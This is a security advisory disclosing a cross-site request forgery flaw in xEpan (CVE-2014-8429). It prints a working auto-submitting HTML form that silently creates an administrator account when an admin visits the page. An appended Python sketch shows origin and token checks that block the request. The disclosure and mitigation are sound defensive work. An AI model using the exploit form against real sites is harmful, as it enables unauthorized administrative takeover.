High-Tech Bridge advisory HTB23240
Oct 22, 2014 - 12:00 a.m.

Cross-Site Request Forgery (CSRF) in xEpan

2014-10-22 00:00:00 | High-Tech Bridge | www.htbridge.com

EPSS: 0.002 (percentile 64.5%)

High-Tech Bridge Security Research Lab discovered a vulnerability in xEpan which can be exploited to compromise a vulnerable website.

  1. Cross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429

The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator into visiting a malicious page containing a CSRF exploit, create a new account with administrative privileges, and gain total control over the vulnerable website.

The simple CSRF exploit below creates an administrative account with username “immuniweb” and password “password”:

<form action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form" method="post" name="main">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" value="name">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" value="[email protected]">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" value="immuniweb">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" value="password">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" value="100">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" value="1">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
<input type="hidden" name="ajax_submit" value="form_submit">
<input type="submit" id="btn">
</form>

<script>
document.main.submit();
</script>
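As an added defensive illustration (not part of the advisory and not xEpan's own code), the Python sketch below applies to the user-creation request the two checks whose absence the advisory describes: validation of the request origin, plus a session-bound synchronizer token that a cross-site page cannot read and therefore cannot forge. The allowed host, the session dictionary and the csrf_token field name are assumptions; the forged form is constructed from the advisory's field names.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed deployment host of the xEpan site (hypothetical; not on the page).
ALLOWED_HOSTS = {"www.example.com"}

# Constructed copy of the advisory's forged POST body. A cross-site page can set
# these fields, but it cannot read the victim's session-bound token.
FORGED_FORM = {
    "web_web_owner_users_crud_virtualpage_form_username": "immuniweb",
    "web_web_owner_users_crud_virtualpage_form_password": "password",
    "web_web_owner_users_crud_virtualpage_form_type": "100",
    "web_web_owner_users_crud_virtualpage_form_is_active": "1",
    "ajax_submit": "form_submit",
}


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the admin's session and return it so the
    legitimate user-creation form can embed it as a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_is_trusted(headers: dict) -> bool:
    """Accept only if Origin (or, when absent, Referer) names one of our hosts.
    Browsers send the attacker's origin on a cross-site form post, and a missing
    Origin and Referer is treated as untrusted rather than silently allowed."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).hostname in ALLOWED_HOSTS
    return False


def user_create_allowed(session: dict, headers: dict, form: dict) -> bool:
    """Gate for the ?page=owner/users add action: both checks must pass."""
    if not origin_is_trusted(headers):
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False
    # Constant-time comparison so token guessing gains no timing signal.
    return hmac.compare_digest(expected.encode(), supplied.encode())
```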